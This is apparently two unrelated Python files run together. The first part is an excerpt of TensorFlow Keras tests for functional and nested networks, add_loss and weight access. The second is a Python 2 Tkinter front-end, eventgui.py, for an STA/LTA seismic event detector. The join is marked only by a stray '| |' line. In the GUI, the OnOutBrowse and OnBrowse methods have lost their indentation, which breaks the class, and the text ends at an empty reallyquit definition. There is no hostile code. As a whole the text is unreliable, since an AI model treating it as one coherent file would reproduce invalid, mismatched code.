  def testNoneInShapeWithCompoundModel(self):

    class BasicBlock(keras.Model):

      def __init__(self):
        super(BasicBlock, self).__init__()
        self.conv1 = keras.layers.Conv2D(8, 3)
        self.pool = keras.layers.GlobalAveragePooling2D()
        self.dense = keras.layers.Dense(3)

      def call(self, x):
        x = self.conv1(x)
        x = self.pool(x)
        x = self.dense(x)
        return x

    class CompoundModel(keras.Model):

      def __init__(self):
        super(CompoundModel, self).__init__()
        self.block = BasicBlock()

      def call(self, x):
        x = self.block(x)  # pylint: disable=not-callable
        return x

    model = CompoundModel()
    model.build(tensor_shape.TensorShape((None, None, None, 1)))
    self.assertTrue(model.built, 'Model should be built')
    self.assertTrue(model.weights,
                    'Model should have its weights created as it '
                    'has been built')
    sample_input = array_ops.ones((1, 10, 10, 1))
    output = model(sample_input)  # pylint: disable=not-callable
    self.assertEqual(output.shape, (1, 3))

  @test_util.run_in_graph_and_eager_modes()
  def testNoneInShapeWithFunctinalAPI(self):

    class BasicBlock(keras.Model):
      # Inheriting from keras.Model (original comment said
      # keras.layers.Layer) since we are calling this block inside a model
      # created using the functional API.

      def __init__(self):
        super(BasicBlock, self).__init__()
        self.conv1 = keras.layers.Conv2D(8, 3)

      def call(self, x):
        x = self.conv1(x)
        return x

    input_layer = keras.layers.Input(shape=(None, None, 1))
    x = BasicBlock()(input_layer)
    x = keras.layers.GlobalAveragePooling2D()(x)
    output_layer = keras.layers.Dense(3)(x)

    model = keras.Model(inputs=input_layer, outputs=output_layer)

    model.build(tensor_shape.TensorShape((None, None, None, 1)))
    self.assertTrue(model.built, 'Model should be built')
    self.assertTrue(model.weights,
                    'Model should have its weights created as it '
                    'has been built')
    sample_input = array_ops.ones((1, 10, 10, 1))
    output = model(sample_input)
    self.assertEqual(output.shape, (1, 3))

  @keras_parameterized.run_all_keras_modes
  def test_sequential_as_downstream_of_masking_layer(self):
    inputs = keras.layers.Input(shape=(3, 4))
    x = keras.layers.Masking(mask_value=0., input_shape=(3, 4))(inputs)

    s = keras.Sequential()
    s.add(keras.layers.Dense(5, input_shape=(4,)))

    x = keras.layers.wrappers.TimeDistributed(s)(x)
    model = keras.Model(inputs=inputs, outputs=x)
    model.compile(
        optimizer='rmsprop',
        loss='mse',
        run_eagerly=testing_utils.should_run_eagerly())

    model_input = np.random.randint(
        low=1, high=5, size=(10, 3, 4)).astype('float32')
    # Zero out a triangular pattern so some timesteps are fully masked.
    for i in range(4):
      model_input[i, i:, :] = 0.
    model.fit(model_input,
              np.random.random((10, 3, 5)), epochs=1, batch_size=6)

    if not context.executing_eagerly():
      # Note: this doesn't work in eager due to DeferredTensor/ops
      # compatibility issue.
      mask_outputs = [model.layers[1].compute_mask(model.layers[1].input)]
      mask_outputs += [model.layers[2].compute_mask(
          model.layers[2].input, mask_outputs[-1])]
      func = keras.backend.function([model.input], mask_outputs)
      mask_outputs_val = func([model_input])
      self.assertAllClose(mask_outputs_val[0], np.any(model_input, axis=-1))
      self.assertAllClose(mask_outputs_val[1], np.any(model_input, axis=-1))

  @test_util.run_in_graph_and_eager_modes()
  def test_external_keras_serialization_compat_input_layers(self):
    inputs = keras.Input(shape=(10,))
    outputs = keras.layers.Dense(1)(inputs)
    model = keras.Model(inputs, outputs)
    config = model.get_config()
    # Checks that single inputs and outputs are still saved as 1-element
    # lists. Saving as 1-element lists or not is equivalent in TF Keras,
    # but only the 1-element list format is supported in TF.js and
    # keras-team/Keras.
    self.assertLen(config['input_layers'], 1)
    self.assertLen(config['output_layers'], 1)

  @test_util.run_in_graph_and_eager_modes()
  def test_external_keras_serialization_compat_inbound_nodes(self):
    # Check single Tensor input.
    inputs = keras.Input(shape=(10,), name='in')
    outputs = keras.layers.Dense(1)(inputs)
    model = keras.Model(inputs, outputs)
    config = model.get_config()
    self.assertEqual(config['layers'][1]['inbound_nodes'], [[['in', 0, 0, {}]]])

    # Check multiple Tensor input.
    inputs1 = keras.Input(shape=(10,), name='in1')
    inputs2 = keras.Input(shape=(10,), name='in2')
    outputs = keras.layers.Add()([inputs1, inputs2])
    model = keras.Model([inputs1, inputs2], outputs)
    config = model.get_config()
    self.assertEqual(config['layers'][2]['inbound_nodes'],
                     [[['in1', 0, 0, {}], ['in2', 0, 0, {}]]])
class GraphUtilsTest(test.TestCase):
  """Tests for keras.utils.tf_utils graph-traversal helpers."""

  @test_util.run_deprecated_v1
  def testGetReachableFromInputs(self):

    with self.cached_session():
      pl_1 = array_ops.placeholder(shape=None, dtype='float32')
      pl_2 = array_ops.placeholder(shape=None, dtype='float32')
      pl_3 = array_ops.placeholder(shape=None, dtype='float32')
      x_1 = pl_1 + pl_2
      x_2 = pl_2 * 2
      x_3 = pl_3 + 1
      x_4 = x_1 + x_2
      x_5 = x_3 * pl_1

      # The reachable set contains both tensors and their producing ops.
      self.assertEqual(
          keras.utils.tf_utils.get_reachable_from_inputs([pl_1]),
          {pl_1, x_1, x_4, x_5, x_1.op, x_4.op, x_5.op})
      self.assertEqual(
          keras.utils.tf_utils.get_reachable_from_inputs([pl_1, pl_2]),
          {pl_1, pl_2, x_1, x_2, x_4, x_5, x_1.op, x_2.op, x_4.op, x_5.op})
      self.assertEqual(
          keras.utils.tf_utils.get_reachable_from_inputs([pl_3]),
          {pl_3, x_3, x_5, x_3.op, x_5.op})
      self.assertEqual(
          keras.utils.tf_utils.get_reachable_from_inputs([x_3]),
          {x_3, x_5, x_5.op})
@test_util.run_all_in_graph_and_eager_modes
class NestedNetworkTest(test.TestCase):
  """Networks whose inputs/outputs are nested structures (dicts, lists)."""

  def test_nested_inputs_network(self):
    inputs = {'x1': keras.Input(shape=(1,)), 'x2': keras.Input(shape=(1,))}
    outputs = keras.layers.Add()([inputs['x1'], inputs['x2']])
    network = keras.engine.network.Network(inputs, outputs)

    network = keras.engine.network.Network.from_config(network.get_config())

    # NOTE(review): the call dict uses keys 'x'/'y' while the network was
    # built with 'x1'/'x2' -- presumably only the flattened structure/order
    # matters here; confirm against Network's nested-input handling.
    result_tensor = network({
        'x': array_ops.ones((1, 1), 'float32'),
        'y': array_ops.ones((1, 1), 'float32')
    })
    result = self.evaluate(result_tensor)
    self.assertAllEqual(result, [[2.]])

    # TODO(b/122726584): Investigate why concrete batch is flaky in some
    # builds.
    output_shape = network.compute_output_shape({
        'x1': (None, 1),
        'x2': (None, 1)
    })
    self.assertListEqual(output_shape.as_list(), [None, 1])

  def test_nested_outputs_network(self):
    inputs = keras.Input(shape=(1,))
    outputs = {
        'x+x': keras.layers.Add()([inputs, inputs]),
        'x*x': keras.layers.Multiply()([inputs, inputs])
    }

    network = keras.engine.network.Network(inputs, outputs)

    network = keras.engine.network.Network.from_config(network.get_config())

    result_tensor = network(array_ops.ones((1, 1), 'float32'))
    result = self.evaluate(result_tensor)
    self.assertAllEqual(result['x+x'], [[2.]])
    self.assertAllEqual(result['x*x'], [[1.]])

    output_shape = network.compute_output_shape((None, 1))
    self.assertListEqual(output_shape['x+x'].as_list(), [None, 1])
    self.assertListEqual(output_shape['x*x'].as_list(), [None, 1])

  def test_nested_network_inside_network(self):
    inner_inputs = {
        'x1': keras.Input(shape=(1,)),
        'x2': keras.Input(shape=(1,))
    }
    inner_outputs = {
        'x1+x2':
            keras.layers.Add()([inner_inputs['x1'], inner_inputs['x2']]),
        'x1*x2':
            keras.layers.Multiply()([inner_inputs['x1'], inner_inputs['x2']])
    }
    inner_network = keras.engine.network.Network(inner_inputs, inner_outputs)

    inputs = [keras.Input(shape=(1,)), keras.Input(shape=(1,))]
    middle = inner_network({'x1': inputs[0], 'x2': inputs[1]})
    outputs = keras.layers.Add()([middle['x1+x2'], middle['x1*x2']])
    network = keras.engine.network.Network(inputs, outputs)

    network = keras.engine.network.Network.from_config(network.get_config())

    # Computes: `(x1+x2) + (x1*x2)`
    result_tensor = network(
        [array_ops.ones((1, 1), 'float32'),
         array_ops.ones((1, 1), 'float32')])
    result = self.evaluate(result_tensor)
    self.assertAllEqual(result, [[3.]])

    output_shape = network.compute_output_shape([(None, 1), (None, 1)])
    self.assertListEqual(output_shape.as_list(), [None, 1])

  @test_util.run_in_graph_and_eager_modes
  def test_updates_with_direct_call(self):
    inputs = keras.Input(shape=(10,))
    x = keras.layers.BatchNormalization()(inputs)
    x = keras.layers.Dense(10)(x)
    model = keras.Model(inputs, x)

    ph = keras.backend.placeholder(shape=(10, 10))
    model(ph)

    # The two updates come from BatchNormalization's moving statistics.
    self.assertLen(model.get_updates_for(ph), 2)
    self.assertLen(model.get_updates_for(None), 0)
@keras_parameterized.run_all_keras_modes
class AddLossTest(keras_parameterized.TestCase):
  """Model.add_loss invoked outside of a layer's call()."""

  def test_add_loss_outside_call_only_loss(self):
    inputs = keras.Input((10,))
    mid = keras.layers.Dense(10)(inputs)
    outputs = keras.layers.Dense(1)(mid)
    model = keras.Model(inputs, outputs)
    model.add_loss(math_ops.reduce_mean(outputs))
    self.assertLen(model.losses, 1)

    initial_weights = model.get_weights()

    # Trains with no targets: the only loss is the added symbolic loss.
    x = np.ones((10, 10))
    model.compile('sgd', run_eagerly=testing_utils.should_run_eagerly())
    model.fit(x, batch_size=2, epochs=1)

    model2 = model.from_config(model.get_config())
    model2.compile('sgd', run_eagerly=testing_utils.should_run_eagerly())
    model2.set_weights(initial_weights)
    model2.fit(x, batch_size=2, epochs=1)

    # The TFOpLayer and the AddLoss layer are serialized.
    self.assertLen(model2.layers, 5)
    self.assertAllClose(model.get_weights(), model2.get_weights())

  def test_add_loss_outside_call_multiple_losses(self):
    inputs = keras.Input((10,))
    x1 = keras.layers.Dense(10)(inputs)
    x2 = keras.layers.Dense(10)(x1)
    outputs = keras.layers.Dense(1)(x2)
    model = keras.Model(inputs, outputs)
    model.add_loss(math_ops.reduce_sum(x1 * x2))
    model.add_loss(math_ops.reduce_mean(outputs))
    self.assertLen(model.losses, 2)

    initial_weights = model.get_weights()

    x, y = np.ones((10, 10)), np.ones((10, 1))
    model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    model.fit(x, y, batch_size=2, epochs=1)

    # Config round-trip with identical starting weights must train the same.
    model2 = model.from_config(model.get_config())
    model2.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    model2.set_weights(initial_weights)
    model2.fit(x, y, batch_size=2, epochs=1)

    self.assertAllClose(model.get_weights(), model2.get_weights())
@keras_parameterized.run_all_keras_modes
class WeightAccessTest(keras_parameterized.TestCase):
  """When `model.weights` is available vs. raises (weights not created)."""

  def test_functional_model(self):
    inputs = keras.Input((10,))
    x1 = keras.layers.Dense(10)(inputs)
    x2 = keras.layers.Dense(10)(x1)
    outputs = keras.layers.Dense(1)(x2)
    model = keras.Model(inputs, outputs)
    # Three Dense layers, each contributing a kernel and a bias.
    self.assertEqual(len(model.weights), 6)

  def test_sequential_model_with_input_shape(self):
    x1 = keras.layers.Dense(10, input_shape=(10,))
    x2 = keras.layers.Dense(10)
    x3 = keras.layers.Dense(1)
    model = keras.models.Sequential([x1, x2, x3])
    self.assertEqual(len(model.weights), 6)

  def test_sequential_model_without_input_shape(self):
    x1 = keras.layers.Dense(10)
    x2 = keras.layers.Dense(10)
    x3 = keras.layers.Dense(1)
    model = keras.models.Sequential([x1, x2, x3])
    # No input shape known yet, so no weights have been created.
    with self.assertRaisesRegexp(
        ValueError, 'Weights for model .* have not yet been created'):
      _ = model.weights

  def test_subclass_model_with_build_method(self):

    class SubclassModel(keras.models.Model):

      def build(self, input_shape):
        self.w = self.add_weight(shape=input_shape[-1], initializer='ones')

      def call(self, inputs):
        return inputs * self.w

    model = SubclassModel()
    with self.assertRaisesRegexp(
        ValueError, 'Weights for model .* have not yet been created'):
      _ = model.weights
    # Calling the model builds it, creating the weight.
    model(keras.Input((10,)))
    self.assertEqual(len(model.weights), 1)

  def test_subclass_model_without_build_method(self):

    class SubclassModel(keras.models.Model):

      def __init__(self):
        super(SubclassModel, self).__init__()
        self.w = self.add_weight(shape=(), initializer='ones')

      def call(self, inputs):
        return inputs * self.w

    model = SubclassModel()
    # Weight created eagerly in __init__, available immediately.
    self.assertEqual(len(model.weights), 1)
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  test.main()
| |
'''eventgui.py -- gui for programstalta.py
usage: python eventgui.py [options]
options:
-h print this
-t ttktheme use theme ttktheme [alt]
-l list available themes and exit
'''
version = "1.10"
lastchangedate = "2014-12-26"
import sys
import getopt
import posixpath as pp
import pprint
from Tkinter import *
import ttk
import tkFont
import tkFileDialog
import tkMessageBox
import base
from serialports import serialports
from logger import log
from programstalta import main as pgmmain
from programstalta import version as pgmversion
def force_suffix(fname, suffix):
    """Return *fname* with the final component's extension replaced by *suffix*.

    A path whose final component is empty (i.e. one ending in a separator)
    is treated as a directory and returned without a suffix, as the original
    docstring promised ("won't suffix a directory").

    Fixes:
    - an empty *suffix* previously crashed with a bare IndexError on
      ``suffix[0]``; it now raises a descriptive ValueError.
    - the old docstring claimed the suffix "should not start with a
      period", yet the code stripped one; the single-leading-period
      tolerance is now documented behavior.

    Args:
        fname: POSIX-style path to rewrite.
        suffix: new extension, with or without one leading period
            (e.g. "txt" or ".txt"); must be non-empty.

    Returns:
        The normalized path with the extension replaced.

    Raises:
        ValueError: if *suffix* is the empty string.
    """
    head, tail = pp.split(fname)
    if len(tail) == 0:
        # Directory path: nothing to suffix.
        return head
    if not suffix:
        raise ValueError("suffix must be a non-empty string")
    if suffix[0] == ".":
        suffix = suffix[1:]
    fpart, _fext = pp.splitext(tail)
    newp = pp.join(head, fpart + "." + suffix)
    return pp.normpath(newp)
class App(object):
    """Tk/ttk front-end for the programstalta STA/LTA event detector.

    Builds one window of labelled entries, checkbuttons and option menus,
    then hands the collected values to programstalta.main as a synthetic
    command line (see OnRun).
    """

    def __init__(self, theme):
        """Create all widgets and styles; *theme* is a ttk theme name."""
        self.root = Tk()
        master = ttk.Frame(self.root)
        self.frame = master
        master.pack(expand=True, fill='both')
        # ---- fonts used by the named ttk styles below ----
        deff = tkFont.Font(size = 14, weight = tkFont.BOLD)
        hedf = tkFont.Font(size = 16, weight = tkFont.BOLD)
        entf = tkFont.Font(size = 14, slant = tkFont.ITALIC,
                           weight = tkFont.BOLD)
        lblf = tkFont.Font(size = 12, weight = tkFont.BOLD)
        btnf = tkFont.Font(size = 12, slant = tkFont.ITALIC,
                           weight = tkFont.BOLD)
        abtnf = tkFont.Font(size = 14, weight = tkFont.BOLD)
        opnf = tkFont.Font(size = 14, slant = tkFont.ITALIC)
        ckbf = tkFont.Font(size = 12, weight = tkFont.BOLD)
        # ---- colour palette ----
        lblfg = "darkblue"
        hlblfg = "#60232E"
        vlblfg = "darkblue"
        ulblfg = "#45232E"
        btnfg = "#45442E"
        qbtnfg = "#bb232E"
        entbg = "lightgray"
        entfg = "darkblue"
        ckbfg = "blue"
        # ---- named ttk styles (head/var/unit labels, coloured buttons) ----
        sty = ttk.Style()
        sty.theme_use(theme)
        sty.configure('.',
                      font = deff)
        sty.configure("head.TLabel",
                      font = hedf,
                      foreground = hlblfg,
                      relief = RAISED,
                      width = 30,
                      sticky = "w")
        sty.configure("TLabel",
                      font = lblf,
                      foreground = lblfg,
                      sticky = "w")
        sty.configure("var.TLabel",
                      font = lblf,
                      foreground = vlblfg,
                      sticky = "e")
        sty.configure("unit.TLabel",
                      font = lblf,
                      foreground = ulblfg,
                      sticky = W)
        sty.configure("TButton",
                      font = btnf,
                      foreground = btnfg,
                      )
        sty.configure("r.TButton",
                      foreground = "blue",
                      font = abtnf)
        sty.configure("f.TButton",
                      foreground = "magenta",
                      font = abtnf)
        sty.configure("q.TButton",
                      foreground = qbtnfg,
                      font = abtnf)
        sty.configure("sl.TButton",
                      foreground = "#ff0000",
                      font = abtnf)
        sty.configure("TEntry",
                      font = entf,
                      foreground = entfg,
                      background = entbg,
                      sticky = "ew",
                      width = 40,
                      )
        sty.configure("TCheckbutton",
                      foreground = ckbfg,
                      font = ckbf,
                      )
        sty.configure("TOptionMenu",
                      font = opnf,
                      foreground = entfg,
                      background = entbg,
                      )
        # Let the algorithm call back into Tk so the GUI stays responsive
        # while programstalta runs in this thread.
        base.Globs["predatacallback"] = master.update
        base.Globs["version"] = "%.2f" % (float(version) + float(pgmversion))
        self.root.title("sta/lta event detection"
                        + " version " + base.Globs["version"]
                        + "        "
                        + " [gui " + version
                        + "  algorithm " + pgmversion + "]"
                        + "        "
                        + "theme: " + theme)
        # NOTE(review): self.truedatafile is reassigned to a StringVar in the
        # "data source" section below; this plain-string assignment is dead.
        self.truedatafile = ""
        self.statefile = ""
        self.isrunning = False
        row = 0
        # ---- processing parameters ----
        row += 1
        lb = ttk.Label(master, text = "processing parameters",
                       style = "head.TLabel")
        lb.grid(row = row, column = 3, columnspan = 2)
        ttk.Label(master, text = " ").grid(row = row, column = 6, padx = 50)
        row += 1
        lb = ttk.Label(master, text = "Tsta ", style = "var.TLabel")
        lb.grid(row = row, column = 3, sticky = E)
        self.Tsta = StringVar(master, "0.25")
        ttk.Entry(master, textvariable = self.Tsta
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " short time average window"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "secs", style = "unit.TLabel"
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = "Tlta ", style = "var.TLabel"
                  ).grid(row = row, column = 3, sticky = E)
        self.Tlta = StringVar()
        self.Tlta.set("90.0")
        ttk.Entry(master, textvariable = self.Tlta
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " long time average window",
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "secs", style = "unit.TLabel"
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = "Trigger ", style = "var.TLabel"
                  ).grid(row = row, column = 3, sticky = E)
        self.Triggerthreshold = StringVar()
        self.Triggerthreshold.set("5.0")
        ttk.Entry(master, textvariable = self.Triggerthreshold
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " sta/lta trigger level"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "ratio", style = "unit.TLabel",
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = "Detrigger ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Detriggerthreshold = StringVar()
        self.Detriggerthreshold.set("2.0")
        ttk.Entry(master, textvariable = self.Detriggerthreshold
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " sta/lta de-trigger level"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "ratio", style = "unit.TLabel",
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = "Trigduration ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Trigduration = StringVar()
        self.Trigduration.set("30.0")
        ttk.Entry(master, textvariable = self.Trigduration,
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " post-trigger event duration"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "secs", style = "unit.TLabel",
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = "Trigdesense ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Trigdsensetime = StringVar()
        self.Trigdsensetime.set("0.0")
        ttk.Entry(master, textvariable = self.Trigdsensetime,
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " lta desense time scale"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "secs", style = "unit.TLabel",
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
        # ---- logging parameters ----
        row += 1
        ttk.Label(master, text = "logging parameters", style = "head.TLabel",
                  ).grid(row = row, column = 3, columnspan = 2)
        row += 1
        ttk.Label(master, text = "Loglevel ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Loglevelsel = StringVar()
        self.Loglevelsel.set("debug")
        self.llb = ttk.OptionMenu(master, self.Loglevelsel,
                                  "debug", "debug", "info", "warning", "error")
        self.llb.grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " logging level"
                  ).grid(row = row, column = 5, sticky = W)
        row += 1
        ttk.Label(master, text = "Logfile ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Logfile = StringVar()
        self.Logfile.set("")
        ttk.Entry(master, textvariable = self.Logfile
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " log (txt) filename"
                  ).grid(row = row, column = 5, sticky = W)
        row += 1
        # Outfile holds the full chosen path; Outshowfile only its basename
        # for display (see OnOutBrowse).
        self.Outfile = StringVar()
        self.Outfile.set("")
        self.Outshowfile = StringVar()
        self.Outshowfile.set("")
        ttk.Button(master, text = "specify output file",
                   command = self.OnOutBrowse,
                   ).grid(row = row, column = 3, sticky = E, padx = 4)
        ttk.Entry(master, textvariable = self.Outshowfile
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " data (sac) filename"
                  ).grid(row = row, column = 5, sticky = W)
        row += 1
        ttk.Label(master, text = "Eventfile ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Eventfile = StringVar()
        self.Eventfile.set("")
        ttk.Entry(master, textvariable = self.Eventfile
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " event (xlsx) filename"
                  ).grid(row = row, column = 5, sticky = W)
        row += 1
        ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
        # ---- control parameters ----
        row += 1
        ttk.Label(master, text = "control parameters", style = "head.TLabel",
                  ).grid(row = row, column = 3, columnspan = 2)
        row += 1
        ttk.Label(master, text = "Jobduration ", style = "var.TLabel",
                  ).grid(row = row, column = 3, sticky = E)
        self.Jobduration = StringVar()
        self.Jobduration.set("")
        ttk.Entry(master, textvariable = self.Jobduration
                  ).grid(row = row, column = 4, sticky = E + W)
        ttk.Label(master, text = " acquisition duration"
                  ).grid(row = row, column = 5, sticky = W)
        ttk.Label(master, text = "secs", style = "unit.TLabel",
                  ).grid(row = row, column = 6, sticky = W)
        row += 1
        self.Doalarm = IntVar()
        ckb = ttk.Checkbutton(master, text = "event alarm ",
                              variable = self.Doalarm)
        ckb.grid(row = row, column = 3, sticky = E)
        self.Alarmduration = StringVar()
        self.Alarmduration.set("2.0")
        ent = ttk.Entry(master, textvariable = self.Alarmduration)
        ent.grid(row = row, column = 4, sticky = E + W)
        lbl = ttk.Label(master, text = " alarm duration")
        lbl.grid(row = row, column = 5, sticky = W)
        lbl = ttk.Label(master, text = "secs", style = "unit.TLabel")
        lbl.grid(row = row, column = 6, sticky = W)
        row += 1
        lbl = ttk.Label(master, text = " ")
        lbl.grid(row = row, column = 3, sticky = W)
        # ---- data source: comport or input file ----
        row += 1
        lbl = ttk.Label(master, text = "data source", style = "head.TLabel")
        lbl.grid(row = row, column = 3, columnspan = 2)
        row += 1
        self.Comcheck = IntVar()
        ckb = ttk.Checkbutton(master, text = "use comport",
                              variable = self.Comcheck)
        ckb.grid(row = row, column = 3, sticky = E)
        comportlist = []
        for name, desc, hwid in serialports():
            comportlist.append(name)
        if len(comportlist) == 0:
            comportlist = ["-none-", ]
        self.comport = StringVar()
        self.comport.set(comportlist[0])
        self.ports = ttk.OptionMenu(master, self.comport, comportlist[-1],
                                    *comportlist)
        self.ports.grid(row = row, column = 4, sticky = E + W)
        lbl = ttk.Label(master, text = " active comport")
        lbl.grid(row = row, column = 5, sticky = W)
        row += 1
        # datafile holds the displayed basename; truedatafile the full path.
        self.datafile = StringVar()
        self.datafile.set("")
        self.truedatafile = StringVar()
        self.truedatafile.set("")
        btn = ttk.Button(master, text = "select input file",
                         command = self.OnBrowse)
        btn.grid(row = row, column = 3, sticky = E, padx = 4)
        lbl = ttk.Label(master, text = " input (sac) file")
        lbl.grid(row = row, column = 5, sticky = W)
        ent = ttk.Entry(master, textvariable = self.datafile)
        ent.grid(row = row, column = 4, sticky = E + W)
        row += 1
        lbl = ttk.Label(master, text = " ")
        lbl.grid(row = row, column = 3, sticky = W)
        # ---- display control checkbuttons ----
        row += 1
        lbl = ttk.Label(master, text = "display control",
                        style = "head.TLabel")
        lbl.grid(row = row, column = 3, columnspan = 2, sticky = E + W)
        row += 1
        self.doplot = IntVar()
        ckb = ttk.Checkbutton(master, text = "plot results",
                              variable = self.doplot)
        ckb.grid(row = row, column = 3, columnspan = 2, sticky = W)
        row += 1
        self.doplotavg = IntVar()
        ckb = ttk.Checkbutton(master, text = "show running averages",
                              variable = self.doplotavg)
        ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
                 padx = 20)
        row += 1
        self.doploty = IntVar()
        ckb = ttk.Checkbutton(master, text = "show trace",
                              variable = self.doploty)
        ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
                 padx = 20)
        row += 1
        self.doploth = IntVar()
        ckb = ttk.Checkbutton(master, text = "plot histograms",
                              variable = self.doploth)
        ckb.grid(row = row, column = 3, columnspan = 2, sticky = W,
                 padx = 20)
        row += 1
        self.showcommand = IntVar()
        ckb = ttk.Checkbutton(master, text = "show command line (debug)",
                              variable = self.showcommand)
        ckb.grid(row = row, column = 3, columnspan = 2, sticky = W)
        row += 1
        ttk.Label(master, text = " ").grid(row = row, column = 3, sticky = W)
        # ---- action buttons: run / finish / save / load / quit ----
        row += 1
        col = 3
        self.runb = ttk.Button(master, text = "run", style = "r.TButton",
                               command = self.OnRun)
        self.runb.grid(row = row, column = col, sticky = N)
        col += 1
        self.finishb = ttk.Button(master, text = "finish",
                                  style = "f.TButton",
                                  command = self.OnFinish)
        self.finishb.grid(row = row, column = col, sticky = N)
        self.finishb.state(("disabled",))
        col += 1
        # save/load are placeholders (see loadState/saveState) and stay
        # disabled.
        savb = ttk.Button(master, text = "save", command = self.saveState,
                          style = "sl.TButton")
        savb.grid(row = row, column = col, sticky = N)
        savb.state(("disabled",))
        col += 1
        loadb = ttk.Button(master, text = "load", command = self.loadState,
                           style = "sl.TButton")
        loadb.grid(row = row, column = col, sticky = W)
        loadb.state(("disabled",))
        col += 1
        btn = ttk.Button(master, text = "quit", style = "q.TButton",
                         command = self.OnQuit)
        btn.grid(row = row, column = col, sticky = N)
        col += 1
        lbl = ttk.Label(master, text = " ")
        lbl.grid(row = row, column = col, sticky = W)
    def OnRun(self):
        """Assemble a programstalta command line from the widgets and run it.

        Runs pgmmain synchronously in this thread; the GUI stays alive via
        the master.update callback registered in __init__.
        """
        args = [
            "eventgui",
            "-g",
            "-S", self.Tsta.get(),
            "-L", self.Tlta.get(),
            "-T", self.Triggerthreshold.get(),
            "-D", self.Detriggerthreshold.get(),
            "-P", self.Trigduration.get(),
            "-F", self.Trigdsensetime.get(),
            "-A", self.Alarmduration.get(),
            "-l", self.Loglevelsel.get(),
            "-m",
            ]
        # Optional output files, with enforced extensions.
        if self.Logfile.get() != "":
            args.extend(("-w", force_suffix(self.Logfile.get(), "txt")))
        if self.Outfile.get() != "":
            args.extend(("-s", force_suffix(self.Outfile.get(), "sac")))
        elif self.Outshowfile.get() != "":
            args.extend(("-s", force_suffix(self.Outshowfile.get(), "sac")))
        if self.Eventfile.get() != "":
            args.extend(("-e", force_suffix(self.Eventfile.get(), "xlsx")))
        # Plot flags: -p enables plotting if any plot option is checked.
        if (self.doplot.get() or self.doplotavg.get()
                or self.doploty.get() or self.doploth.get()):
            args.append("-p")
        if self.doplotavg.get():
            args.append("-r")
        if self.doploty.get():
            args.append("-y")
        if self.doploth.get():
            args.append("-d")
        if not self.Doalarm.get():
            args.append("-q")
        # Data source: file replay (quiet) or live comport acquisition.
        # NOTE(review): "-q" can be appended twice when the alarm is off AND
        # no comport is used -- presumably harmless to the option parser;
        # confirm in programstalta.
        if self.Comcheck.get() == 0:
            args.append("-q")
            if self.truedatafile.get() != "":
                args.append(self.truedatafile.get())
            elif self.datafile.get() != "":
                args.append(self.datafile.get())
            else:
                tkMessageBox.showerror(title = "no data source",
                                       message = "check 'use comport' or provide a data file")
                return
        else:
            if self.comport.get() != "-none-":
                args.extend(("-c", self.comport.get()))
                if self.Jobduration.get() != "":
                    args.extend(("-i", self.Jobduration.get()))
            else:
                tkMessageBox.showerror(title = "no available serial port",
                                       message = "you must choose a data file")
                self.Comcheck.set(0)
                return
        if self.showcommand.get():
            # Debug aid: dump the synthetic argv before running.
            print >> sys.stderr, "--------command line-----------"
            pprint.pprint(args, stream = sys.stderr)
            print >> sys.stderr, "-------------------------------"
        base.Globs["quitflag"] = False
        base.Globs["finishflag"] = False
        self.runb.state(("disabled",))
        self.finishb.state(("!disabled",))
        self.isrunning = True
        r = pgmmain(args)  # blocking call; returns when acquisition ends
        self.isrunning = False
        self.finishb.state(("disabled",))
        self.runb.state(("!disabled",))
        if r != 0:
            log().error("pgmmain returned %s" % r)
            self.reallyquit()
        if base.Globs["quitflag"]:
            # A quit was requested while running: shut the GUI down now.
            log().debug("quitting on global quitflag")
            self.reallyquit()
        base.Globs["quitflag"] = True
        base.Globs["finishflag"] = True
def OnOutBrowse(self):
self.Outfile.set(tkFileDialog.asksaveasfilename(
filetypes = [('sac data file', '*.sac')]))
if self.Outfile.get() != "":
self.Outshowfile.set(pp.basename(self.Outfile.get()))
def OnBrowse(self):
self.truedatafile.set(tkFileDialog.askopenfilename())
if self.truedatafile.get() != "":
self.datafile.set(pp.basename(self.truedatafile.get()))
    def loadState(self):
        """Placeholder: restore GUI state from self.statefile (not implemented;
        the 'load' button is created disabled)."""
        pass

    def saveState(self):
        """Placeholder: persist GUI state to self.statefile (not implemented;
        the 'save' button is created disabled)."""
        pass
    def reallyquit(self):
